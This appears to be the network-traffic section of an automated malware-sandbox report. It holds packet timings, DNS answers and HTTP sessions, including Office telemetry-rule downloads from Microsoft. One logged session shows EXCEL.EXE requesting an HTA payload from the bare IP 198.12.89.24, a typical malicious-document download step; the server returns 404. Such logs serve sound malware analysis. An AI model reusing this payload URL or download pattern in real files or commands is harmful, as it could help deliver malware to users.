                Mar 15, 2025 09:08:24.071780920 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071798086 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.071835995 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.071841955 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.072146893 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.072150946 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.072160006 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.072187901 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.072212934 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.072221041 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.072231054 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.072258949 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.073008060 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.073024988 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.073065996 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.073074102 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.073126078 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.074388027 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.074404955 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.074443102 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.074449062 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.074489117 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.074531078 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.075154066 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.075176954 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.075217962 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.075237036 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.075319052 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158009052 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158032894 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158080101 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158092022 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158121109 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158150911 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158386946 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158404112 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158449888 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158457994 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158555984 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158556938 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158569098 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158592939 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158597946 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158613920 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158617973 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158642054 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158669949 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158742905 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158759117 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158787012 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158792973 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.158818960 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.158835888 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.159015894 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.159032106 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.159066916 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.159073114 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.159100056 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.159110069 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.159941912 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.159972906 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.160001040 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.160007000 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.160037041 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.160060883 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.161068916 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.161150932 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.161199093 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.161226034 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.161237955 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.161237955 CET49732443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:24.161247969 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:24.161254883 CET4434973213.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.056768894 CET49734443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.056797981 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.057447910 CET49734443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.059914112 CET49735443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.059947014 CET4434973513.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.060277939 CET49735443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.060616970 CET49734443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.060630083 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.061273098 CET49735443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.061284065 CET4434973513.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.694494963 CET4434973513.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.735517025 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.737992048 CET49735443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.783652067 CET49734443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.783653975 CET49735443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.783663034 CET4434973513.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.783663034 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.784230947 CET49735443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.784235954 CET4434973513.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.785887957 CET49734443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.785892963 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.880345106 CET4434973513.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.880404949 CET4434973513.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.880490065 CET49735443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.880742073 CET49735443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.880757093 CET4434973513.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.880765915 CET49735443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.880773067 CET4434973513.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.886096001 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.886121988 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.886169910 CET49734443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.886181116 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.886296034 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.886346102 CET49734443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.886862993 CET49734443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.886879921 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:08:29.886888981 CET49734443192.168.2.413.107.246.60
                Mar 15, 2025 09:08:29.886894941 CET4434973413.107.246.60192.168.2.4
                Mar 15, 2025 09:09:05.285116911 CET4972980192.168.2.4198.12.89.24
                Mar 15, 2025 09:09:05.289863110 CET8049729198.12.89.24192.168.2.4
                TimestampSource PortDest PortSource IPDest IP
                Mar 15, 2025 09:08:22.472992897 CET5844753192.168.2.41.1.1.1
                Mar 15, 2025 09:08:22.491887093 CET53584471.1.1.1192.168.2.4
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Mar 15, 2025 09:08:22.472992897 CET192.168.2.41.1.1.10x543aStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Mar 15, 2025 09:07:17.132972002 CET1.1.1.1192.168.2.40x2271No error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                Mar 15, 2025 09:07:17.132972002 CET1.1.1.1192.168.2.40x2271No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                Mar 15, 2025 09:07:17.132972002 CET1.1.1.1192.168.2.40x2271No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                Mar 15, 2025 09:07:18.457608938 CET1.1.1.1192.168.2.40xb238No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                Mar 15, 2025 09:07:18.457608938 CET1.1.1.1192.168.2.40xb238No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                Mar 15, 2025 09:08:22.491887093 CET1.1.1.1192.168.2.40x543aNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                Mar 15, 2025 09:08:22.491887093 CET1.1.1.1192.168.2.40x543aNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                Mar 15, 2025 09:08:22.491887093 CET1.1.1.1192.168.2.40x543aNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                Mar 15, 2025 09:08:22.491887093 CET1.1.1.1192.168.2.40x543aNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                Mar 15, 2025 09:08:22.491887093 CET1.1.1.1192.168.2.40x543aNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                • otelrules.svc.static.microsoft
                • 198.12.89.24
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449729198.12.89.24807860C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                TimestampBytes transferredDirectionData
                Mar 15, 2025 09:08:07.336937904 CET246OUTGET /xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: 198.12.89.24
                Connection: Keep-Alive
                Mar 15, 2025 09:08:07.804723024 CET539INHTTP/1.1 404 Not Found
                Date: Sat, 15 Mar 2025 08:08:07 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                Content-Length: 298
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=iso-8859-1
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 31 32 2e 38 39 2e 32 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 198.12.89.24 Port 80</address></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.44973213.107.246.604437860C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                TimestampBytes transferredDirectionData
                2025-03-15 08:08:23 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                Host: otelrules.svc.static.microsoft
                2025-03-15 08:08:23 UTC472INHTTP/1.1 200 OK
                Date: Sat, 15 Mar 2025 08:08:23 GMT
                Content-Type: text/plain
                Content-Length: 1114783
                Connection: close
                Vary: Accept-Encoding
                Cache-Control: public
                Last-Modified: Wed, 12 Mar 2025 22:11:58 GMT
                ETag: "0x8DD61B2E85B8C36"
                x-ms-request-id: e7c70e09-201e-0071-077d-95ff15000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20250315T080823Z-186895dd8bdpng2nhC1EWRufus00000004q0000000002zc3
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2025-03-15 08:08:23 UTC15912INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                2025-03-15 08:08:23 UTC16384INData Raw: 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20
                Data Ascii: !#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32" I="1" O="false">
                2025-03-15 08:08:23 UTC16384INData Raw: 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20
                Data Ascii: <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32" I="0" O="false">
                2025-03-15 08:08:23 UTC16384INData Raw: 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20
                Data Ascii: <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <L> <S
                2025-03-15 08:08:23 UTC16384INData Raw: 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20
                Data Ascii: FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T="28" /> </C>
                2025-03-15 08:08:23 UTC16384INData Raw: 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d 34 33 63 39 2d 62 61 34 63 2d 39 35 32 65 65 31 33 30 35 34 30
                Data Ascii: Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-43c9-ba4c-952ee130540
                2025-03-15 08:08:23 UTC16384INData Raw: 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d
                Data Ascii: > <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U64" I="0" O="true" N=
                2025-03-15 08:08:23 UTC16384INData Raw: 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 37 38 35 32 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d
                Data Ascii: "4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V V="27852" T="I32" />
                2025-03-15 08:08:23 UTC16384INData Raw: 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d
                Data Ascii: <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException"> <C> <S T=
